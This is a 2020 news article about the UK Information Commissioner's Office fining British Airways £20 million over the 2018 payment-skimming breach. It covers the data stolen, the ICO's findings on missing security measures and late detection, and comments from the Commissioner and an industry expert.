ICO fines British Airways £20m for 2018 data breach

The Information Commissioner's Office has fined British Airways £20 million for failing to prevent a cyber attack in 2018 that compromised the personal data of approximately 429,612 customers and staff, including payment card numbers and CVV numbers of 244,000 BA customers.

The £20 million fine is a fraction of the fine of £183.39 million that the Information Commissioner's Office initially intended to levy on British Airways. ICO said the final amount was arrived at after taking into consideration the economic impact of COVID-19 on British Airways' business as well as the airline's representations.

The incident, for which British Airways attracted the massive fine, involved hackers using 22 lines of script to modify a large number of scripts on the British Airways' website and then exploiting the modifications to extract information from payment forms and transfer such information to their own server.

The hackers planted data skimming code on the British Airways website and between August 21 and September 5 2018, exfiltrated names, addresses, payment card numbers, and CVV numbers of 244,000 BA customers. The hackers also stole usernames and passwords of BA employee and administrator accounts as well as usernames and PINs of up to 612 BA Executive Club accounts.

According to the Information Commissioner's Office, British Airways could have prevented the breach of data belonging to customers and staff by limiting access to applications, data, and tools, undertaking rigorous testing, in the form of simulating a cyber-attack, on the business’ systems, and protecting employee and third party accounts with multi-factor authentication.

ICO noted that British Airways did not detect the data exfiltration from its website for more than two months after the attack began on 22nd June 2018. It was only after a third party alerted the airline about the cyber attack that it acted promptly and notified the ICO.

"It is not clear whether or when BA would have identified the attack themselves. This was considered to be a severe failing because of the number of people affected and because any potential financial harm could have been more significant," ICO said.

“People entrusted their personal details to BA and BA failed to take adequate measures to keep those details secure. Their failure to act was unacceptable and affected hundreds of thousands of people, which may have caused some anxiety and distress as a result. That’s why we have issued BA with a £20m fine – our biggest to date,” said Information Commissioner Elizabeth Denham.

“When organisations take poor decisions around people’s personal data, that can have a real impact on people’s lives. The law now gives us the tools to encourage businesses to make better decisions about data, including investing in up-to-date security,” she added.

According to ICO, the breach suffered by British Airways compromised the following information:

  • Personal data of approximately 429,612 customers and staff, including names, addresses, payment card numbers, and CVV numbers of 244,000 BA customers.
  • Combined card and CVV numbers of 77,000 customers and card numbers only for 108,000 customers.
  • Usernames and passwords of BA employee and administrator accounts as well as usernames and PINs of up to 612 BA Executive Club accounts.

Commenting on the fine issued by the ICO, Stuart Reed, UK Director at Orange Cyberdefense, said that while the size of the fine may be smaller than many people expected, the impact on the airline in terms of customer trust could have an even bigger impact that the financial cost. The ICO finding that the airline was processing a significant amount of personal data without adequate security measures in place is particularly damning.

“Organisations are expected demonstrate best security practice at all times. It is imperative that they recognise that the onus is on them to make sure they have done everything they can to protect customer data. Otherwise, the consequences can be complex and extremely costly.

“Firms must adopt a layered security approach that includes people, process, and enabling technologies to reduce the risk, minimise the impact of a breach should one occur, and demonstrate diligence and best practice to both customers and governing bodies,” he added.

Copyright Lyonsdown Limited 2020